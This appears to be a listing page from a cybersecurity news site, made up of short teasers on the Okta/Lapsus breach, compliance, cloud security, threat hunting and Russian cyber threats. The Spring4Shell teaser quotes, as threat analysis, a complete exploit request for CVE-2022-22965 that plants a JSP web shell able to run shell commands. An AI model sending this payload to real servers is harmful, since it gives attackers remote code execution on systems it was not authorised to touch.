Okta: Just Two Customers Impacted by Lapsus Breach

Okta: Just Two Customers Impacted by Lapsus Breach

Okta has revealed that just two of its customers were affected by an incident in January in which threat actors compromised a third-party vendor’s workstation. The authentication specialist completed its investigation into the events that took place between January 16 and 21 this year, when it was believed that a hacker from the Lapsus group gained access to back-end systems. Previously, Okta estimated that 366 customers may have had their tenants accessed by the attackers via a Sitel support engineer’s…

Read More

Top Tips for Moving from Compliance to Cybersecurity Excellence

Top Tips for Moving from Compliance to Cybersecurity Excellence

Compliance should be an essential part of business operations, regardless of industry. Taking preventative measures to manage compliance and mitigate risk can feel like a hassle upfront, but it can save your organisation huge costs in the long run. Compliance violations can result in fines, penalties, lawsuits, loss of reputation, and more. However, your efforts should not stop at obtaining a compliance certificate, rather they should expand to accelerate your cybersecurity posture. Compliance frameworks to…

Read More

What makes telecommunication companies a fertile ground for attack?

What makes telecommunication companies a fertile ground for attack?

Telecommunication is the first, and most robust network ever invented.  This may seem like a brazen and bold statement, but when examined closely, it is not the stuff of fantasy.  Prior to the invention and development of the internet, what other way could a person pick up a device, and “dial” a few numbers and end up seamlessly connected to someone across the vast expanse of a countryside?  Early telephones were a local only affair,…

Read More

Data traction: Is your company a “data thriver” or just a “survivor”?

Data traction: Is your company a “data thriver” or just a “survivor”?

In recent times, the phrase “data is the new oil” has become an overused cliché. However, while it has helped create awareness around the value of data, many companies are still struggling to realise the full potential from the data they’re accumulating. Where possible, these interactions with data need to be insightful, automated and immediate or it merely remains a large jumble of noughts and ones. This is known as data traction. Mining for gold…

Read More

CIO Leadership Live with Rebecca Thomas of PwC New Zealand

CIO Leadership Live with Rebecca Thomas of PwC New Zealand

Rebecca Thomas, CIO for PwC New Zealand, discusses how she lifted her team’s staff engagement rate to 96%, built a diverse team and a culture that allows people to bring their whole self to work. Thomas says it’s all about enabling the team to “connect to their purpose” and creating “IT jobs that don’t suck.” Watch this episode: Source link

Read More

Secure application development for the cloud best practices

Secure application development for the cloud best practices

Why follow best practices? Understanding and following best practices as well as building in the cloud on Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform™, Kubernetes, containers, and applications will enable you to get the most out of your toolkit. This includes more security as you are building, more proficiency with the tools and services you are using, better structure, faster environment, a reliable system that will withstand outages, and a more cost-effective solution….

Read More

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners. The following code is used to create the web shell: GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1 Host: <redacted>:<redacted> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 X: <% Y: Runtime Z: %>// Accept-Encoding: gzip   The web shell’s…

Read More

Why sovereign cloud is a hot topic – 5 tips, and the background

Why sovereign cloud is a hot topic – 5 tips, and the background

Sovereign cloud is not a new concept. It has just become very topical due to a changing geopolitical landscape and new regulations that affect control of data. To put it briefly, sovereign cloud provides a smart solution for an international battle of digital sovereignty, but let’s dig a little deeper. Solving the legal limbo around cloud services European industries and public sector organisations are storing more and more data in cloud data centres. As everyone knows,…

Read More

How to make threat hunting feasible, Part I: Detection

How to make threat hunting feasible, Part I: Detection

I have two stories to tell you. The first is about a software developer at a big financial corporation. The second is about the security team at the same company. We will go through the same cyber incident, from these two perspectives, to get a good understand of how a malicious actor might try to infiltrate a banking application through an admin user, and how the company can detect this malicious behavior – using automation…

Read More

US Officials Increase Warnings About Russian Cyber-Attacks

US Officials Increase Warnings About Russian Cyber-Attacks

Senior US officials have stepped up their warnings about Russian cyber-attacks on critical national infrastructure (CNI) as the war in Ukraine intensifies. During an interview on “60 Minutes” on CBS, Deputy Attorney General Lisa Monaco from the Department of Justice (DoJ) and Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly discussed cyber-threats and the steps the DoJ and CISA are taking to prepare for possible Russian cyber-attacks. “We are seeing Russian state actors scanning,…

Read More
1 3,116 3,117 3,118 3,119 3,120 4,117